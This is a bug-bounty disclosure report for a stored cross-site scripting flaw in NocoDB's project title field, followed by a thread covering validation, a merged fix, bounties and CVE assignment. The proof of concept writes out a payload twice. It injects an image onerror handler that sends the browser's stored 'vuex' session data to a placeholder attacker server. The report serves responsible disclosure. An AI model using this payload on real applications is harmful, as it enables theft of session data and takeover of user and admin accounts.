Account takeover due to stored XSS in "Project Title" in nocodb/nocodb

Valid

Reported on

Jun 3rd 2022


Description

The Project "Title" of the NocoDB application is vulnerable to stored xss which can leads to admin account takeover.

Proof of Concept

Login with low privileged users and Click on "New Project" then click on "Create"

Now write the payload <img src=x onerror=this.src="http://hacker_server:port/?"+localStorage.getItem("vuex")> and again click on "Create"

Then login from super admin account and "delete" the created project  <img src=x onerror=this.src="http://hacker_server:port/?"+localStorage.getItem("vuex")>

poc video

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

Impact

Can takeover all users account.

We are processing your report and will contact the nocodb team within 24 hours. a month ago
Raj modified the report
a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 25 days ago
Raj
23 days ago

Researcher


Hello @admin the maintainer has provided the email id so can you pls invite them to this report

We have contacted a member of the nocodb team and are waiting to hear back 23 days ago
Jamie Slome
23 days ago

Admin


Sorted 👍

Raj modified the report
23 days ago
Raj modified the report
22 days ago
Raj
22 days ago

Researcher


@admin Pls send them the updated report

Raj
22 days ago

Researcher


@admin here is the poc video: ``` https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

Raj
22 days ago

Researcher


@admin here is the poc video:

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

of account takover.

navi validated this vulnerability 22 days ago
Raj has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
navi confirmed that a fix has been merged on ffad5a 22 days ago
navi has been awarded the fix bounty
Raj
22 days ago

Researcher


@admin The fix is deployed so can you pls assign the cve?

Jamie Slome
21 days ago

Admin


The CVE has been assigned and should be published soon 👍

to join this conversation